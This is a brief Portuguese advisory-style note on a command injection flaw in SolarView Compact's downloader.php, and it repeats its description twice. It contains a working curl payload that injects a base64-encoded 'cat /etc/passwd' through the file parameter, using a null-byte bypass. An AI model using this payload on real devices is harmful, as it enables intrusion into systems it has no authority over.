
Existe uma vulnerabilidade de injeção de comandos no SolarView Compact até a versão 6.00, atacantes podem executar comandos ao contornar restrições internas através do downloader.php.
Existe uma vulnerabilidade de injeção de comandos no SolarView Compact até a versão 6.00, onde atacantes podem executar comandos contornando restrições internas através do downloader.php.
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
Os comandos podem ser injetados ao contornar restrições internas através do parâmetro file da página downloader.php.
